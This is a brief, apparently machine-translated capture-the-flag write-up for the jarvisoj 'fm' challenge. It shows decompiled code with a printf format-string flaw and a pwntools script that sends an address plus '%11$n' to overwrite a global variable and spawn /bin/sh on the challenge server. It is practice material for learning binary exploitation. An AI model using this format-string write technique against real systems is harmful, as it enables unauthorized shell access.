[61dctf]fm

[61dctf]fm

Attachment address : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399

nc pwn2.jarvisoj.com 9895

checksec Canary found The stack overflows and the travel is blocked

main function

stay if Determine the x Value , however x The value of is beyond our control ,printf Output &buf Value , Here is a format string attack , and if The judgment is 4 and $n Can output 4 Of int Value to any address .

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

You can see the output aaaa The offset of 11

Through dynamic debugging , hold x Is set to 0x4, After running, you really get shell

exp

from pwn import *


io = process("./stack")
io = remote("pwn2.jarvisoj.com", 9895)
x_addr = 0x0804A02C
context(log_level="debug", arch="i386")

payload = flat([x_addr,'%11$n'])



io.sendline(payload)
io.interactive()